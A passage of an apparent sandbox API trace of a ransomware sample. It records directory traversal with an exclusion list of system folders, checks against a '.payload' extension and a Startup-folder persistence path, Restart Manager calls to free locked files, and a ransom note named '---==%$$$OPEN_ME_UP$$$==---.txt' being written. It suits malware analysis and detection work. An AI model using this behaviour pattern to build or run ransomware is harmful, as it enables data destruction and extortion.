lpSrch=".payload") returned 0x0 [0072.615] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.615] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0072.615] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0072.615] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\bootmgr.exe.mui" (normalized: "c:\\boot\\fi-fi\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.615] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0072.615] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0072.615] RmStartSession () returned 0x0 [0072.617] RmRegisterResources () returned 0x0 [0072.622] RmGetList () returned 0x0 [0073.407] RmEndSession () returned 0x0 [0073.559] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0073.559] FindNextFileW (in: hFindFile=0x606360, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0073.559] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0073.559] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0073.559] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0073.559] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0073.559] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0073.559] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\memtest.exe.mui") returned 33 [0073.559] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".payload") returned 0x0 [0073.559] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0073.559] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0073.559] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\fi-FI\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0073.560] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.560] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0073.560] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0073.560] RmStartSession () returned 0x0 [0073.562] RmRegisterResources () returned 0x0 [0073.567] RmGetList () returned 0x0 [0073.906] RmEndSession () returned 0x0 [0074.149] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0074.149] FindNextFileW (in: hFindFile=0x606360, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef59a5b1, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0074.149] FindClose (in: hFindFile=0x606360 | out: hFindFile=0x606360) returned 1 [0074.149] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fi-FI\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0074.149] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\fi-fi\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.152] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0074.153] CloseHandle (hObject=0x430) returned 1 [0074.153] GetProcessHeap () returned 0x5e0000 [0074.153] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0074.153] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="Fonts", cAlternateFileName="")) returned 1 [0074.153] lstrcmpiW (lpString1="Fonts", lpString2="Windows") returned -1 [0074.153] lstrcmpiW (lpString1="Fonts", lpString2="$Recycle.bin") returned 1 [0074.153] lstrcmpiW (lpString1="Fonts", lpString2="System Volume Information") returned -1 [0074.153] lstrcmpiW (lpString1="Fonts", lpString2="Program Files") returned -1 [0074.153] lstrcmpiW (lpString1="Fonts", lpString2="Program Files (x86)") returned -1 [0074.153] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts") returned 17 [0074.153] lstrcmpW (lpString1="Fonts", lpString2=".") returned 1 [0074.153] lstrcmpW (lpString1="Fonts", lpString2="..") returned 1 [0074.153] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\Fonts", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0074.153] GetProcessHeap () returned 0x5e0000 [0074.153] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0074.153] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\*") returned 19 [0074.153] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6063e0 [0074.155] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0074.155] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0074.155] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0074.155] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0074.155] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0074.155] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\.") returned 19 [0074.155] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.155] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0109451, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef999ae4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0074.156] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0074.156] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0074.156] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0074.156] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0074.156] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0074.156] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\..") returned 20 [0074.156] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0074.156] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.156] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc49ab3c7, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef782dd9, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x386467, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0074.156] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Windows") returned -1 [0074.156] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="$Recycle.bin") returned 1 [0074.156] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="System Volume Information") returned -1 [0074.156] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Program Files") returned -1 [0074.156] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="Program Files (x86)") returned -1 [0074.156] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf") returned 30 [0074.156] StrStrIW (lpFirst="chs_boot.ttf", lpSrch=".payload") returned 0x0 [0074.156] lstrcmpW (lpString1="chs_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.156] lstrcmpW (lpString1="chs_boot.ttf", lpString2="taridd") returned -1 [0074.156] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0074.156] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.157] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0074.157] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0074.157] RmStartSession () returned 0x0 [0074.159] RmRegisterResources () returned 0x0 [0074.164] RmGetList () returned 0x0 [0074.411] RmEndSession () returned 0x0 [0074.584] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0074.584] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a1dbea, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef81cc08, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x3b2e0a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0074.584] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Windows") returned -1 [0074.584] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="$Recycle.bin") returned 1 [0074.584] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="System Volume Information") returned -1 [0074.584] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Program Files") returned -1 [0074.584] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="Program Files (x86)") returned -1 [0074.584] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf") returned 30 [0074.584] StrStrIW (lpFirst="cht_boot.ttf", lpSrch=".payload") returned 0x0 [0074.584] lstrcmpW (lpString1="cht_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0074.584] lstrcmpW (lpString1="cht_boot.ttf", lpString2="taridd") returned -1 [0074.585] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0074.585] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.586] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0074.586] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0074.586] RmStartSession () returned 0x0 [0074.589] RmRegisterResources () returned 0x0 [0074.593] RmGetList () returned 0x0 [0074.849] RmEndSession () returned 0x0 [0075.198] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0075.198] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a902c2, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8771a7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1e4d4b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0075.198] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Windows") returned -1 [0075.198] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="$Recycle.bin") returned 1 [0075.199] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="System Volume Information") returned -1 [0075.199] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Program Files") returned -1 [0075.199] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="Program Files (x86)") returned -1 [0075.199] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf") returned 30 [0075.199] StrStrIW (lpFirst="jpn_boot.ttf", lpSrch=".payload") returned 0x0 [0075.199] lstrcmpW (lpString1="jpn_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.199] lstrcmpW (lpString1="jpn_boot.ttf", lpString2="taridd") returned -1 [0075.199] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0075.199] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.201] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0075.201] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0075.201] RmStartSession () returned 0x0 [0075.203] RmRegisterResources () returned 0x0 [0075.208] RmGetList () returned 0x0 [0075.433] RmEndSession () returned 0x0 [0075.527] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0075.527] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b4eed5, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8c4060, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x243588, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0075.527] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Windows") returned -1 [0075.527] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="$Recycle.bin") returned 1 [0075.527] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="System Volume Information") returned -1 [0075.527] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Program Files") returned -1 [0075.527] lstrcmpiW (lpString1="kor_boot.ttf", lpString2="Program Files (x86)") returned -1 [0075.527] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf") returned 30 [0075.527] StrStrIW (lpFirst="kor_boot.ttf", lpSrch=".payload") returned 0x0 [0075.527] lstrcmpW (lpString1="kor_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.527] lstrcmpW (lpString1="kor_boot.ttf", lpString2="taridd") returned -1 [0075.527] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0075.527] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.528] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0075.528] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0075.528] RmStartSession () returned 0x0 [0075.531] RmRegisterResources () returned 0x0 [0075.535] RmGetList () returned 0x0 [0075.781] RmEndSession () returned 0x0 [0075.950] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0075.950] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8e28b4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2ab6f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="malgunn_boot.ttf", cAlternateFileName="MALGUN~1.TTF")) returned 1 [0075.951] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="Windows") returned -1 [0075.951] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="$Recycle.bin") returned 1 [0075.951] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="System Volume Information") returned -1 [0075.951] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="Program Files") returned -1 [0075.951] lstrcmpiW (lpString1="malgunn_boot.ttf", lpString2="Program Files (x86)") returned -1 [0075.951] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\malgunn_boot.ttf") returned 34 [0075.951] StrStrIW (lpFirst="malgunn_boot.ttf", lpSrch=".payload") returned 0x0 [0075.951] lstrcmpW (lpString1="malgunn_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0075.951] lstrcmpW (lpString1="malgunn_boot.ttf", lpString2="taridd") returned -1 [0075.951] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\malgunn_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0075.951] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgunn_boot.ttf" (normalized: "c:\\boot\\fonts\\malgunn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.952] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0075.952] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0075.952] RmStartSession () returned 0x0 [0075.955] RmRegisterResources () returned 0x0 [0075.960] RmGetList () returned 0x0 [0076.333] RmEndSession () returned 0x0 [0076.509] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0076.509] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8f4db4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2b506, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="malgun_boot.ttf", cAlternateFileName="MALGUN~2.TTF")) returned 1 [0076.509] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="Windows") returned -1 [0076.509] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="$Recycle.bin") returned 1 [0076.509] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="System Volume Information") returned -1 [0076.509] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="Program Files") returned -1 [0076.509] lstrcmpiW (lpString1="malgun_boot.ttf", lpString2="Program Files (x86)") returned -1 [0076.509] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\malgun_boot.ttf") returned 33 [0076.509] StrStrIW (lpFirst="malgun_boot.ttf", lpSrch=".payload") returned 0x0 [0076.509] lstrcmpW (lpString1="malgun_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.509] lstrcmpW (lpString1="malgun_boot.ttf", lpString2="taridd") returned -1 [0076.509] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\malgun_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0076.509] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\malgun_boot.ttf" (normalized: "c:\\boot\\fonts\\malgun_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.511] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0076.511] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0076.511] RmStartSession () returned 0x0 [0076.513] RmRegisterResources () returned 0x0 [0076.518] RmGetList () returned 0x0 [0076.734] RmEndSession () returned 0x0 [0076.928] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0076.928] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4b9b37e, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef9072c7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf24aec9d, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x2318a, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="meiryon_boot.ttf", cAlternateFileName="MEIRYO~1.TTF")) returned 1 [0076.928] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="Windows") returned -1 [0076.928] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="$Recycle.bin") returned 1 [0076.928] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="System Volume Information") returned -1 [0076.928] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="Program Files") returned -1 [0076.928] lstrcmpiW (lpString1="meiryon_boot.ttf", lpString2="Program Files (x86)") returned -1 [0076.928] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\Fonts\\meiryon_boot.ttf") returned 34 [0076.928] StrStrIW (lpFirst="meiryon_boot.ttf", lpSrch=".payload") returned 0x0 [0076.928] lstrcmpW (lpString1="meiryon_boot.ttf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.928] lstrcmpW (lpString1="meiryon_boot.ttf", lpString2="taridd") returned -1 [0076.928] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\Fonts\\meiryon_boot.ttf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0076.928] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\meiryon_boot.ttf" (normalized: "c:\\boot\\fonts\\meiryon_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.938] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0076.938] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0076.938] RmStartSession () returned 0x0 [0076.940] RmRegisterResources () returned 0x0 [0076.945] RmGetList () returned 0x0 [0077.421] RmEndSession () returned 0x0 [0077.620] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0077.620] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, 